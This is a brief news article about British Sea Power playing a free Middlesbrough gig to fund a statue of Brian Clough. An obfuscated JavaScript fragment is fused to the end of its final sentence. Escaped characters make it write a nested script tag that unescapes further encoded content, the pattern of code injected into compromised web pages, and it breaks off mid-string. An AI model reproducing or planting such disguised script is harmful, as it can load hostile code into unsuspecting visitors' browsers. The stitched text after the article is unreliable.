British Sea Power are to play a gig to help raise money to build a statue of fotball legend Brian Clough.
The band are playing Middlesbrough Empire on July 28 in aid of the Brian Clough Memorial Fund. They have agreed to perform for free as they are all fans of 'Cloughie'.
The Middlesbrough Brian Clough Memorial Fund has so far raised over £25,000 towards a memorial for the Boro-born legend. The statue will depict the young Cloughie walking to "work" through Ayresome Park, Middlesbrough's old ground.
Clough found fame as a player, but his most notable success was as a manager with Nottingham Forest, winning two European Cups with the club in 1979 and 1980.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
